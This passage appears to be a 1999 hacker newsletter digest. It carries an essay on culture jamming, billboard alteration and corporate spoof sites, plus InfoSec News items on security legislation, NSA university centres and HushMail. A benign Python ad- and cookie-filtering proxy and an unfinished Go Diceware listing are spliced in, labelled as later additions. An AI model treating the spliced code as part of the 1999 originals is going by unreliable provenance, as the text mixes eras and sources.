Forget the names Jerry Rubin and Abbie Hoffman. The prima donna of underground radicalism is probably Saul Alinsky, whose anti-establishment and over-the-top forms of guerilla media propelled a wide variety of alternative causes into the 60s mainstream. As one Amazon reviewer writes,

Mr. Alinsky captures the outrage organizers have with the status quo. 'Why organize?' is the central question that permeates throughout this book, and Mr.
Alinsky answers this question with a scathing attack on the powers that be, who are beholden to maintaining the status quo. Mr. Alinsky allows the reader to not just dream of a better America but doles out powerful, practical methods to either: A. work within the current system to effect positive change, or B. bring the system to its knees in the quest toward positive change. An absolute must read for anyone wishing to take on the status quo of poverty, injustice, hatred, and discrimination.

If Alinsky had one major rule (other than "shock them") it was: "use their own rules against them". Consequently, Alinsky followers employed such radical tools as the court system, community newspapers, and town hall meetings. Early meme hackers in the Alinsky mold modified that advice only slightly: use their own words against them. Thus, for example, the Billboard Liberation Front modified public advertising to give common messages a slightly different - and twisted - meaning. Beginning in 1977 (by dropping the "M" in "Max Factor" they highlighted the disturbing undertones in that company's slogan, "A pretty face isn't safe in this city") the BLF conducted a series of highly visible alterations in the San Francisco Bay area. The BLF was followed by many others, for example, POPaganda (Ron English). As the Apocalyptic Optimism for the End of History (Abrupt) puts it,

"Culture Jamming" sticks where rational discourse slides off. It is, simply, the viral introduction of radical ideas. It is viral in that it uses the enemy's own resources to replicate itself -- copy machines, defaced billboards, web pages. It is radical because--ideally--the message, once deciphered, causes damage to blind belief. Fake ads, fake newspaper articles, parodies, pastiche. The best CJ is totally unexpected, surprising, shocking in its implications.

In a similar vein, Team Seven practised a series of renegade construction activities, recommending for example to its readers that they raise a flag of their own design at their local bank after it has closed for the day, or that they set up a reading area in a predefined other-usage area, such as a car wash or highway median. The Survival Research Laboratories in San Francisco adopt a more artistic format:

Since its inception SRL has operated as an organization of creative technicians dedicated to re-directing the techniques, tools, and tenets of industry, science, and the military away from their typical manifestations in practicality, product or warfare. Since 1979, SRL has staged over 45 mechanized presentations in the United States and Europe. Each performance consists of a unique set of ritualized interactions between machines, robots, and special effects devices, employed in developing themes of socio-political satire. Humans are present only as audience or operators.

Meme hacking was limited by technology in the early days. Even Dery could only identify four major categories:

Sniping and Subvertising (e.g. Adbusters)
Media Hoaxing (e.g. Joey Skaggs)
Audio Agitprop (e.g. Sucking Chest Wound, whose God Family Country ponders mobthink and media bias; The Disposable Heroes of Hiphoprisy, who take aim in "Television, the Drug of the Nation")
Billboard Banditry (e.g. Billboard Liberation Front)

Adbusters is a Vancouver based anti-advertising magazine. It is perhaps best known for its Buy Nothing Day and TV Turn-Off Week campaigns. In addition to the monthly magazine, Adbusters attempts to run anti-consumerism advertisements on mainstream television. The response from the networks is usually negative; Adbusters' messages are labelled "controversial" and banned. Its most recent campaign, Is Economic Progress Killing the Planet, planned for airing during the G-7 conference in Germany, was rejected by the British Advertising Clearance Council as unacceptable.

A similar agency is The Centre for Media and Democracy, which focuses not just on advertising, but on public relations generally. As the agency's web site states,

Unlike advertising, public relations is often hard to recognize. "The best PR is invisible," say industry insiders. To spin the news in favor of their clients, PR firms specialize in setting up phony citizens' groups and scientific "experts" who spin out contrived research using junk science.

The Centre's main vehicle, like Adbusters, is a quarterly magazine, PR Watch, and they have released two books, Toxic Sludge Is Good For You: Lies, Damn Lies and the Public Relations Industry (1995) and Mad Cow USA: Could the Nightmare Happen Here? (1999).

The term Culture Jamming has its origins in the audio agitprop arena, and specifically, with an experimental-music and art collective known as Negativland. They write on their website,

Advertising, especially the high tech seduction and emotional button pushing going on in national brand advertising, has become a special subject of interest for Negativland because of its telling view into the successful manipulation of the mass psyche, and the degree to which it exploits our common mental environment with the promotion of personal dissatisfaction and constant desire mongering on a universal scale.

Other anti-meme artists include The Seemen, "a collaborative of some forty odd art drop outs and extreme technology inventors who enjoy exploring their taste for the dark side of applied engineering in robot/kinetic art," and the Cacophony Society, including the Los Angeles Cacophony Society and Cacophony Midwest, which recently launched the First Annual St. Louis Santa Rampage. "The Cacophony Society is an open network of creative malcontents, guerrilla artists, slackers, hooligans, kitsch-hounds, and anyone else interested in subverting primetime reality. You may already be a member!"

Hacking Memes 9. Electronic Warfare

The meme hackers of the 70s and 80s were marginalized. Their reach was limited, and social commentary following their acts (and subsequent arrests) was uniformly negative. Society as a whole - so it seemed - branded them as vandals and anarchists, radicals and communists. With the advent of the internet in the late 80s and early 90s, meme hacking was given a new life. While their access to mainstream media was still limited, activists could now communicate with each other in rapid, free and uncensored messages. Moreover, the internet - and especially the world wide web - gave them a means of reaching directly into the mainstream consciousness, bypassing the media altogether.

Early electronic meme hacking consisted of two major tactics: slashing, and spamming. Slashing is the appropriation of an existing meme for subcultural purposes. The term "slashing" derives from pornographic "K/S" - short for "Kirk/Spock" - stories written by Star Trek fans and published in underground fanzines. The theme unifying such stories is Kirk and Spock's long homosexual affair - an affair only alluded to in the on-air version of the series. The development of 'fan fiction' in general - and more recently, fanzines, fan web sites, and fan discussion boards - has had the effect of removing control of the 'product' from the corporate studio and placing it in the hands of the general public. Star Trek, in particular, has been the subject of hundreds of fan pages, and when Paramount attempted to crack down on the sites (in order to promote its Microsoft-only version), fans rebelled.

The first subversive spam was probably Joe Matheny's deluge of ascii frogs sent to the White House (in return for which, he received in good order a deluge of automated reply messages). Matheny quickly wrote a shell program to filter the auto-replies and return them to their sender, which set up an email loop.
With the advent of its abuse by more corporate interests (ZDNet and Xoom take note), spamming has declined as a weapon of choice, revealing as it does a general disregard for its recipients' needs and interests.

An image - Eduardo Kac led things off with a slide presentation demonstrating how the Web can become a life source. During his experiment in 1996, people worldwide were asked to join a teleconference, anytime during a three week period. The participants simply aimed their cameras to the heavens so that light on the other end of their transmission could be used to grow a freshly planted seed, which had been isolated in total darkness. Through the nourishment of the white lights, the seedling grew to 18" in height and was later planted outside the Art Institute of Chicago.

The central question of electronic counterculture revolves around media itself: who owns it, who controls it, and who uses it. As Jesse Hirsh writes, "We need to examine the right to communicate, and the communication of our rights." Dery echoes this theme:

Who will have access to this cornucopia of information, and on what terms? Will fiber-optic superhighways make stored knowledge universally available, in the tradition of the public library, or will they merely facilitate psychological carpet bombing designed to soften up consumer defenses? And what of the network news? Will it be superseded by local broadcasts, with their heartwarming (always "heartwarming") tales of rescued puppies and shocking (always "shocking") stories of senseless mayhem, mortared together with airhead banter? Or will the Big Three give way to innumerable news channels, each a conduit for information about global, national and local events germane to a specific demographic? Will cyberpunk telejournalists equipped with Hi-8 video cameras, digital scanners, and PC-based editing facilities hack their way into legitimate broadcasts? Or will they, in a medium of almost infinite bandwidth and channels beyond count, simply be given their own airtime? In short, will the electronic frontier be wormholed with "temporary autonomous zones"---Hakim Bey's term for pirate utopias, centrifuges in which social gravity is artificially suspended---or will it be subdivided and overdeveloped by what cultural critic Andrew Ross calls "the military-industrial-media complex?"

The answer lies in the nature of the internet. Everybody will have access to information. The very nature of cyberspace is that it is interpersonal and multidirectional. There is no control and - despite the best efforts of the censors - there is no overseer. We see for the first time the elements of mainstream media on the retreat, trying to legislate, trying to litigate, trying to appropriate. But as the nature of cyberspace is communication, such efforts will be in vain, for communication is deeply personal, exactly the opposite of the mass media message. We see this through concrete examples of anti-meme activities on the net.

Hacking Memes 10. The Network

The internet is about community. This is something corporate culture realized too late. The recent received wisdom of electronic commerce is that to be successful, online advertising must foster the development of community. But the countercultural community is already well established and well entrenched. Entities such as San Francisco's Laughing Squid have been using the internet to advertise their monthly countercultural 'tentacle sessions' for years now. Alternative 'religions' - such as the Church of the SubGenius - congregate online and poke fun at mainstream values and culture. Organizations such as the Center for Commercial-Free Public Education use the internet to post messages, coordinate activist campaigns, and spread information.

Activists are able to publicize to each other the effects of their anti-meme activities, as for example, this post describes the subversion of a political campaign:

Two weeks ago there was a story that made the headlines in the newspaper and Compass (PEI's Evening News). The story was that a pamphlet had been distributed in the riding of Barry Hicken, our Minister of Environmental Resources. The pamphlet was made to look like a campaign pamphlet, with pictures of Hicken and the Liberal Party logo. It stated things like:
- My job as Minister of Environmental Resources has been very rewarding. I make over $74,000 a year. My wife still can't believe it. Please, please, please vote for me. I'll get you a job. I promise.

Agencies such as Tao "organize networks in order to defend and expand public space and the right to self-determination. (They) create knowledge through independent public interest research, and distribute it freely through participatory education." Other sites advise and promote subversive activities. The network is well entrenched and it's growing; there seems to be no interrupting the flow of communication.

Online activism also enables people to shelter themselves from the mainstream culture. One recent tactic is called junk busting, which involves using proxy software to filter banners and cookies and to mask HTTP header data. A similar initiative attacks Intel and especially Intel's PSN (Processor Serial Number). And the fictional identity of Luther Blissett - complete with web site and email address - has been offered to the community at large for "communication guerrilla actions, hacktivism, civil disobedience (electronic and not) and radical mythopoesis."

Hacking Memes 11. Web Ad Jamming and Spoof Sites

A wide array of anti-advertising sites, home page spoofs, and more express more clearly than any words the sentiments of the anti-meme movement.
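Returning briefly to the junk-busting proxies mentioned under Hacking Memes 10 above: such a proxy sits between the browser and the web server and rewrites what passes through it, in both directions. The Python below is an added illustration written for this digest; it is not code from Junkbusters or from any other project the essay names. The blocklist patterns, the generic User-Agent string, the set of stripped headers and the sample request and response are all constructed for the example. The functions work on the HTTP head as text, so the same logic runs offline without a socket.

```python
import re
from typing import List, Optional, Tuple

# Constructed blocklist: URL fragments that a banner-filtering proxy refuses to
# fetch. Illustrative patterns only, not Junkbusters' own list.
BLOCKED_URL_PATTERNS = [
    re.compile(r"/ads?/", re.IGNORECASE),            # .../ad/... or .../ads/...
    re.compile(r"banner", re.IGNORECASE),            # anything with "banner" in it
    re.compile(r"^https?://ads?\.", re.IGNORECASE),  # hosts such as ads.example.net
]

# Request headers that reveal identity or browsing history; the proxy drops them.
STRIPPED_REQUEST_HEADERS = {"cookie", "referer", "from"}

# A deliberately generic User-Agent so the client cannot be fingerprinted (assumed value).
GENERIC_USER_AGENT = "Mozilla/4.0 (compatible)"


def parse_head(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split an HTTP/1.x request or response head into (start line, header pairs)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def is_blocked(url: str) -> bool:
    """True if the requested URL matches any banner pattern."""
    return any(p.search(url) for p in BLOCKED_URL_PATTERNS)


def sanitize_request(raw: str) -> Optional[str]:
    """Rewrite an outgoing request head; return None if the proxy should refuse it."""
    request_line, headers = parse_head(raw)
    method, url, version = request_line.split(" ", 2)
    if is_blocked(url):
        return None
    kept = []
    for name, value in headers:
        lname = name.lower()
        if lname in STRIPPED_REQUEST_HEADERS:
            continue                    # drop identifying headers entirely
        if lname == "user-agent":
            value = GENERIC_USER_AGENT  # mask rather than drop, so servers still answer
        kept.append(f"{name}: {value}")
    return "\r\n".join([f"{method} {url} {version}", *kept]) + "\r\n\r\n"


def sanitize_response(raw: str) -> str:
    """Drop Set-Cookie from an incoming response head so the browser never stores one."""
    status_line, headers = parse_head(raw)
    kept = [f"{n}: {v}" for n, v in headers if n.lower() != "set-cookie"]
    return "\r\n".join([status_line, *kept]) + "\r\n\r\n"


# Constructed sample traffic (not captured from any real site).
SAMPLE_REQUEST = (
    "GET http://www.example.com/news/index.html HTTP/1.0\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/4.5 [en] (X11; U; Linux 2.2.5 i586)\r\n"
    "Referer: http://www.example.com/search?q=culture+jamming\r\n"
    "Cookie: sessionid=abc123\r\n"
    "Accept: */*\r\n"
    "\r\n"
)
BANNER_REQUEST = (
    "GET http://ads.example.net/banner/468x60.gif HTTP/1.0\r\n"
    "Host: ads.example.net\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: tracker=xyz; path=/\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(sanitize_request(SAMPLE_REQUEST))
    print("blocked" if sanitize_request(BANNER_REQUEST) is None else "allowed")
    print(sanitize_response(SAMPLE_RESPONSE))
```

The trade-off a practitioner should expect: stripping Referer and Cookie unconditionally breaks sites that rely on them for login sessions or hotlink checks, which is why filtering proxies of this kind carry per-site exception lists alongside the blocklist.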
Spoof sites have probably existed since the advent of the World Wide Web, but in recent months their profile - and the litigation against them - has increased. The dean of corporate spoof sites is probably ®TMark (pronounced 'Art Mark'). Originally a secretive and underground agency, ®TMark has entered the public arena. ®TMark is the behind-the-scenes broker of anti-meme mayhem. Projects are suggested by readers and staff, anonymous donors line up to fund different projects, and teams of activists carry out the plan. ®TMark pranks have included switching the voice boxes in G.I. Joe and Barbie dolls, inserting homosexual couples in Sim Copter graphics, and online, a scathing spoof site for Shell Oil, and most recently, a lavish G.W. Bush parody site.

Corporate sites in general are ripe for spoof and parody. Happyclown, Inc. is an exciting firm devoted to using a fresh and new approach to Corporate Communications:

This young, modern and progressive Public Relations venture will make the aesthetic sensibilities of the New Generation available for the use of the familiar and trusted institutions of the Old Generation. It is also several other things....

Hole City presents the reader with a sideways look at media moguls.

"It's a tremendous angle," says Rupert Murdoch, the media magnate whose fiery alliance with Satan has brought him fame, fortune and the Los Angeles Dodgers. "Our demographics indicate that Americans respond positively 53% of the time when we tell them the truth."

Other anti-corporate sites include Critical Mess Media (CMM), Mess Media's DisConnection (DisCo), and ZNet Anarchy Watch. A variation on this theme includes what the Culture Jammer's Encyclopedia calls News Trolls:

If there's one thing that the left and the right can agree on, it's that the news is inaccurate, biased, and is more likely to cement popular prejudice than to uncover uncomfortable truths. So there's a certain satisfaction in deliberately planting absurd fiction among all the news that's fit.

Examples of fiction include the Arm the Homeless campaign, a computer that can replace judges, and the phoney Detroit gang incident. In Canada, underground tactics are employed by Guerrilla Media - "media monkeywrenching for British Columbia, Canada" - purveyors of the National Post parody site and the Conrad Black Envy page:

Finally! A website for all of us who are profoundly envious of the Blacks-- Conrad and Barbara-- commanders-in-chief of the world's fastest growing press empire. This site is but a humble attempt to celebrate the Blacks' words and world: their unpretentious persiflage, personal pecuniary plentitude, pertinacious pedantry, proprietorial parsimony, perspicacious pomposity, and polymorphous periphrastic preeminence.

These and more patently false news sites cause some people to warn that "you can't trust everything you read on the internet". But their subversion is deeper - they inform the public that "you can't trust everything you read". No wonder news agencies and academics want to create "authoritative" web news sources.

Another popular tactic reacts to the increasing commercialization of the web. A number of sites are creating and propagating spoof web ads. Such ads are meme hacking at its best - they lie generally ignored (check the top of this page), silently spreading subversion. Spoof web ads are available on Positive Propaganda's unsorted banner page, from Chickenhead, Stay Free! Magazine, Abrupt's Holy War Now by 'Tony Alamo', and The Corporation's twisted children's companion, Cyberbear.

Hacking Memes 12. The Anti-Meme

The anti-meme is probably typified by the Kitty Porn site. The idea is to take an existing meme, alter it, and thus show its unreasonable or arbitrary nature. This is not a new idea - it was practised to great effect by the German philosopher Friedrich Nietzsche ("the transvaluation of value"). But online, such anti-memes are able for the first time to gain wide currency. Consider the spoof Alien Visitors Information Centre. This travelogue site makes fun of Chamber-of-Commerce inspired tourist brochures. But there is a deeper transvaluation:

Kurt Waldheim is one of the large, hairy, upright-walking beasts selected as their leader through the recent United Nations model for better campground management. As U.N. secretary-general, Waldheim's personal greetings were launched in Voyagers 1 and 2, travelling AVIC kiosks in space which also carry the sounds of chimpanzees screeching. When we made those decisions, the management did not know Mr. Waldheim helped murder thousands of fellow humans during something significant called World War II. The employees who were responsible have been sacked.

The AVIC makes the very simple point that our contemporary culture is still capable of electing mass-murderers as world leaders, a fact verified by the many ongoing conflicts and genocides today. The anti-meme highlights the absurdity and even the moral decay of the mass-media meme:

Our society spends a lot of time telling us that there is some brand new, fresh cultural produce, generated from thin air and sunshine, slick and clean. They package it with pretty plastic & ribbons and then feed it to us. A lot gets thrown away: the ribbons, the wrapping; culture becomes garbage, or it dies, and rots behind the refrigerator. But the new fluffy shiny stuff still gets churned out, and it gets forced between our teeth. And we are told to swallow it. We will not swallow. We will chew, and then spit. We will play with our food, and create something new and interesting from it.

This is similar to the Adbusters "Is Economic Progress Killing Our Planet" campaign, and a host of other messages pointing to the waste and absurdity of the economic order as it exists today.
The idea is to show that the sanitary culture presented in mass culture isn't the sanitary and stain-free entity the messages proclaim it to be. "The possibility of adding pimples to the retouched photo of the face on the cover of America are only now being seen as artistic territory." The anti-message is very simple: this is not good. Corporate and cultural abuses are legion, from the Exxon Valdiz oil spill to the Union Carbide poisoning of tens of thousands of people in Bhopal, India. Yet criticism is mute. As the Overcoming Consumerism site observes, The often asked question, "why doesn't the media talk about corporate power?" and the frequent answer "because the corporations own the media...", really is a simplification of a wide-ranging process of power-sharing and wealth-retention that goes more to the kinds of people behind the corporations than the actual corporations themself. The anti-meme is an attack not only on corporate and government policies and practises, but also on the media messages themselves. Hence, for example, we see sites such as White Dot, which ask, "What do you do if you don't watch TV?" References Adbusters. Agency Website. http://adbusters.org Adbusters. is Economic Progress Killing the Planet. Media campaign. 1999. http://adbusters.org/progress/progress.html Adbusters. Brits miss out on G8 Summit message. Press Release. 1999 http://www.adbusters.org/campaigns/economic-pressrelease.html Advertising Age. Corporate Web Site. http://www.adage.com/ Alinsky, Saul. Titles, listed at Amazon.com. http://www.amazon.com/exec/obidos/Author%3DAlinsky%2C%20Saul%20D. /thecenterformediA/002-3999677-2858208 Apocalyptic Optimism for the End of History. Culture Jamming. Web Site. http://www.abrupt.org/CJ/CJ.html Baffler, The. Commodify your dissent. Magazine - counterculture ideas and opinions. Purchase from http://www.dustygroove.com/baffler.htm Home site at http://www.thebaffler.org/ Baumgertner, Peter, and Payr, Sabine. 
Learning as Action: A Social Science Approach to the Evaluation of Interactive Media. CSS Journal Volume 5 Number 2 - March/April, 1997. http://www.webcom.com/journal/baumgart.html Bennahum, David. Meme. Mailing List Web Site. http://memex.org/welcome.html Bennahum, David. Meme definition. http://www.ed.cqu.edu.au/~bigumc/Meme/meme_definition.html Big Brother Inside. Web Site. http://www.bigbrotherinside.com/ Billboard Liberation Front. Agency Web Site. http://www.billboardliberation.com Bissett, Luther. 'Personal' home page. http://www.syntac.net/lutherblissett/ Bourroughs, William S. The Electronic Revolution. http://www.syntac.net/dl/elerev2.html Brooks, Meredith. Bitch. 1998. Columbia Records. http://hollywoodandvine.com/starlandmotel/media/ram/video/ meredithbrooks-bitch.ram First Annual St. Louis Santa Rampage. Web Site. http://home.postnet.com/~cacophony/santa.htm Canadian Broadcasting Corporation. Corporate Web Site. http://www.cbc.ca Centre for Media and Democracy. Agency Web Site. http://www.prwatch.org/ Channel One Corporate Web Site. http://www.channelone.com Chickenhead. Zine. http://www.chickenhead.com CHUM Media Group. Corporate Web Site. http://www.chum.com Church of the SubGenius. Home Page. http://www.subgenius.com/ Church of the SubGenius. We're the Happy People. http://www.subgenius.com/bigfist/ answers/rants/ad/ad.html Corcoran, Terence. Attack of the tomato killers. National Post, May 4, 1999. http://www.nationalpost.com/financialpost.asp?s2=opinion&s3= theeditor&f=990504/2555310.html Corporation, The. Parody. http://www.thecorporation.com/ Corporation, The. Cyberbear. Parody. http://www.thecorporation.com/ runninggags/cyberbear/index.html Critical Mess Media (CMM). Parody site. http://www.rootmedia.org/~messmedia/ Dawkins, Richard. The Selfish Gene. 1976. Book site with excerpts. http://www.spacelab.net/~catalj/selfpage.htm Dery, Mark. Culture Jamming: Hacking, Slashing and Sniping at the Empire of Signs. 
http://web.nwe.ufl.edu/~mlaffey/cultcover.html Detritus.net. Zine. Home Page. http://www.detritus.net/ English, Ron. POPaganda: Illegal Billboards. Web Site. http://www.popaganda.com/Billboards/body_billboards.html Ewan, Stewart Ewan PR! A Social Theory of Spin. Book Site. http://www.bway.net/~drstu/ Fisher, Ebon. The Alula Dimension. Web Art. Be patient - dig through it. http://www.users.interport.net/~outpost/ebon.html Fisher, Ebon. Mess up your neighbours: The Weird Thing Zone http://www.users.interport.net/~alula/weirdzone.html Garton, Andrew. Breaking the Loop: A spoken word / performance lecture. Based on the Internet/radio installation, Sensorium Connect. satellite Dispatch - Acustica - 2.01 http://www.toysatellite.com.au/news/acustica/201/01.html Grytting, Wayne. Top NEWSPEAK Stories of the Month #113. Student Activists' Network. May, 1999. http://san.tao.ca/san01800.html Gurilla Media. Home Page. http://www.guerrillamedia.org/ Gurilla Media. National Post parody site. Parody. http://www.national-post.8m.com/ Gurilla Media. Conrad Black Envy. Parody. http://www.blackenvy.com/ habitat2@cycor.ca culture jamming before the polls in PEI! Sat, 9 Nov 1996. http://www.tao.ca/earth/media-l/old/1/0051.html Hacker's Dictionary, The. Meme http://www.elsewhere.org/jargon/jargon_28.html#TAG1126 Happyclown, Inc. Parody site. http://www.happyclown.com/mainmenu.html Hays, Constance L. Math Textbook Salted With Brand Names Raises New Alarm. NY Times, March 21, 1999. http://metalab.unc.edu/stayfree/public/math_texts.html Headspace. How to make Trouble and Influence - C is for Culture Jamming. Headspace Issue #4. http://www.abc.net.au/arts/headspace/rn/bbing/trouble/c.htm Henderson, Rich. Interview with Joe Matheny. Undated. Hirsh, Jesse. Culture Jamming: Democracy Now Campus Life 114, November 11, 1998. http://www.campuslife.utoronto.ca/groups/varsity/archives/118/nov11/ feature/culture.html Idiosyntactix Arts and Sciences Alliance. Home Page. 
http://www.syntac.net/ Idiosyntactix. Culture-Jammer's Enclyclopedia. http://www.syntac.net/hoax/index.html JunkBusters. Home Page. http://www.junkbusters.com/ Karrera, Adam. Virtual Slap: A Keynote Presentation Web Review, June 23, 1998 http://webreview.com/wr/pub/web98/tues/keynote.html Klatte, Arline. "Hey Gang, Let's Put On A Show" Survival Research Labs up against it...again SF Gate, July 6, 1998 http://www.sfgate.com/cgi-bin/article.cgi?file=/technology/archive/ 1998/07/06/srl.dtl Lane, Randall. You are what you wear. Forbes, May 26, 1999. http://www.forbes.com/forbes/101496/5809042a.htm Laughing squid. Home Page. http://www.laughingsquid.com/ McDonalds. Corporate Web Site. http://www.mcdonalds.com McLaren, Carrie. Review of the Baffler Issue 5. 1999? http://metalab.unc.edu/pub/electronic-publications/ stay-free/7/baffler.htm Mclaren, Carrie. Advertising the Uncommercial. Matador, Issue #6 - 1999? Messmedia. DisConnection (DisCo). Parody site. http://messmedia.rootmedia.org/disconnection/ National Post. The National Post. Corporate Web Site. http://www.nationalpost.com Negativeland. Negativeworldwidewebland. Band Web Site. http://www.negativland.com/ Nike. Corporate Web Site. http://www.nike.com Overcoming Consumerism. Web Site. http://www.hooked.net/users/verdant/index.htm Positive Propaganda. Unsorted Banners. Ad Parodies. http://www.honeylocust.com/positive/unsort.html Practical Magic. Movie Web Site. 1998. Warner Brothers. http://www.practicalmagic.com Public Broadcasting System. Corporate Web Site. http://www.pbs.org Principia Cybernetica Web. Memetics. http://pespmc1.vub.ac.be/memes.html Quebec Public Interest Research Group Liberating Media: a weekend of culture jamming, media, and community democracy. 1997. http://www.tao.ca/earth/toronto/archive/1997/toronto00100.html Reebok. Corporate Web Site. http://www.reebok.com ®TMark. Home Page. http://www.rtmark.com ®TMark. Full Projects List. http://www.rtmark.com/listallprojects.html ®TMark. Shell. 
(Note - often not listed by DNS Servers - go figure)
http://shell.rtmark.com

®TMark. G.W.Bush.com
http://www.gwbush.com

saggau@earthlink.net. Review of Rules for Radicals. Amazon.com, December 29, 1998.
http://www.amazon.com/exec/obidos/ASIN/0679721134/002-3999677-2858208

Seemen, The. Society web site.
http://www.seemen.org

Sippey, Michael. Live or Memorex? The Obvious, December 12, 1996.
http://www.theobvious.com/archives/021296.html

Stay Free! Magazine. Home Page.
http://metalab.unc.edu/stayfree/

Stay Free! Issue #13: Marketing to Kids. Zine.
http://metalab.unc.edu/stayfree/13/index.html

Stay Free! Issue #14: Interview with Stewart Ewan. Zine.
http://metalab.unc.edu/stayfree/14/ewen1.html

Tao. Home Page.
http://www.tao.ca

Turner, John. Where Will They Strike Next? Shift 7.3, May, 1999.
http://www.shift.com/shiftstd/html/onlineTOC/1999/7.3/html/ArtMark1.html

Vanatta, Rob. Meredith Brooks Net. Fan Site. 1997, 1998.
http://web.csuchico.edu/~rvanatta/mbrooks/

Whalen, John. The Mayhem is the Message. Metroactive Cyberscape - 1995.
http://www.metroactive.com/cyber/jamming.html

White Dot. Web Site.
http://www.whitedot.org/welikeit.html

Woolley, Wayne. Florida reporter falls for phony Detroit gang hoax on Internet. The Detroit News, December 6, 1996.
http://detnews.com/cyberia/culture/961206/hoax/hoax.htm

ZNet. Anarchy Watch. Web Site.
http://www.zmag.org/AWatch/awatch.htm

Email Stephen Downes at downes@newstrolls.com
copyright newstrolls.com 1999 all rights reserved!

@HWA

29.0 [ISN] House panel aims to bolster security law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 21 May 1999 00:58:50 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] House panel aims to bolster security law

Forwarded From: William Knowles

http://www.fcw.com/pubs/fcw/1999/0517/web-security-5-20-99.html

House panel aims to bolster security law
(Federal Computer Week) [5.20.99]

WASHINGTON, D.C.
-- The House Science Committee plans to make another push to update a 1989 law that requires civilian agencies to take measures to protect their computer systems, according to Rep. Constance Morella (R-Md.), chairwoman of the Technology Subcommittee of the House Science Committee.

The new bill, which could be introduced as early as next week, would revamp the 10-year-old Computer Security Act. The bill will closely resemble the Computer Security Enhancement Act of 1997, which the House passed only to have it die in the Senate last year, said Morella, speaking at a symposium sponsored by the SmartCard Forum.

Like the 1997 bill, the proposed legislation would tap the National Institute of Standards and Technology as the lead agency for information security. The preceding bill also would have required NIST to promote federal use of commercial off-the-shelf products for civilian security needs.

The committee first began its effort to revamp the existing law to reflect the proliferation of network technology that has left agency data more vulnerable to corruption and theft, Morella said in 1997.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

30.0 [ISN] NSA Taps Universities For Info Security Studies
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 21 May 1999 01:13:40 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] NSA Taps Universities For Info Security Studies

Forwarded From: SpyKing@con2.com

NSA Taps Universities For Info Security Studies

The National Security Agency has designated seven U.S. universities as centers for information-security education, the agency said Tuesday.

The NSA, a super-secret spy agency that wields broad power over U.S. encryption policy, named two private Virginia universities and a handful of state universities as Centers of Academic Excellence in Information Assurance Education.
They are: James Madison University, George Mason University, Idaho State University, Iowa State University, Purdue University, University of California at Davis, and the University of Idaho.

The centers are expected to become "focal points for recruiting, and may create a climate to encourage independent research in information assurance," the NSA said.

The agency said the decision to launch the information-assurance program represented an attempt to reach out and form partnerships with industry pursuant to a Clinton administration directive last year on critical infrastructure protection.

The seven centers will be formally recognized during a conference on information-security systems scheduled for May 25 to 29 at IBM's conference facility in Palisades, N.Y.

@HWA

31.0 [ISN] HushMail: free Web-based email with bulletproof encryption
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sat, 22 May 1999 06:16:04 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] HushMail: free Web-based email with bulletproof encryption

Forwarded From: Keith Dawson

1999-05-19: ..HushMail: free Web-based email with bulletproof encryption

Hush Communications has quietly begun beta testing a significant development in email privacy. HushMail [1] works like Hotmail or Rocketmail -- you can set up multiple free accounts and access them from any Web browser anywhere -- but when you email another HushMail user your communication is protected by unbreakable encryption. The crypto, implemented in a downloadable Java applet, was developed outside of US borders and so has no export limitations. Here are the FAQ [2] and a more technical overview [3] of the HushMail system.

HushMail public and private keys are 1024 bits long, and are stored on a server located in Canada.
All information sent between the HushApplet and the HushMail server is encrypted via the Blowfish symmetric 128-bit algorithm. The key to this symmetric pipe is randomly generated each session by the server and is transferred to the client machine over a secure SSL connection.

When you sign on as a new user you can choose an anonymous account or an identifiable one. For the latter you have to fill out a demographic profile, to make you more attractive (in the aggregate) to HushMail's advertisers. The HushApplet walks you through generating a public-private key-pair. The process is fun and slick as a smelt. You need to come up with a secure pass-phrase, and in this process HushMail gives only minimal guidance. You might want to visit Arnold Reinhold's Diceware page [4], where he lays out a foolproof pass-phrase protocol utilizing a pair of dice.

HushMail relies heavily on Java (JVM 1.1.5 or higher), so it can only be used with the latest browsers. The earliest workable version of Netscape's browser is 4.04, but some features don't work in versions before 4.07; the latest version, 4.5, is best. For Internet Explorer users, 4.5 is recommended, but the latest Windows release of IE 4.0 (subversion 4.72.3110) works as well. Red Hat Linux version 5.2 is also tested and supported. Unfortunately, HushMail does not work on Macintoshes, due to limitations in Apple's Java implementation. (Mac users can crawl HushMail under Connectix Virtual PC. Note that I don't say "run." I've tried this interpretation-under-emulation and do not recommend it.) The company is trying urgently to connect with the right people at Apple to get this situation remedied.

One of the limitations of this early release of HushMail is that encryption can only be used to and from another HushMail account. It is not currently possible to export your public/private key-pair, to set up automatic forwarding of mail sent to a HushMail account, or to import non-Hush public keys.
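The Diceware protocol the article points to is simple enough to show in full. The program below is an added example written for this digest, not code from HushMail, Hush Communications or Arnold Reinhold: it reads five die throws as a base-6 index into a 7776-word list, computes how many words a target strength needs, and emits the five-digit lookup keys a user would look up in the printed list. The OS random source stands in for the physical dice, and the function names are this example's own.

```go
package main

import (
	"crypto/rand"
	"fmt"
	"math"
	"math/big"
	"strings"
)

// Diceware chooses each passphrase word with five throws of a six-sided
// die; the five digits, read as a base-6 number, index a published list
// of 6^5 = 7776 words. Added example; not HushMail's or Reinhold's code.
const (
	diceWords    = 7776 // entries in a full Diceware word list
	rollsPerWord = 5
)

// rollDie returns one unbiased throw (1..6) from the OS CSPRNG, standing
// in for the physical dice the protocol uses.
func rollDie() int {
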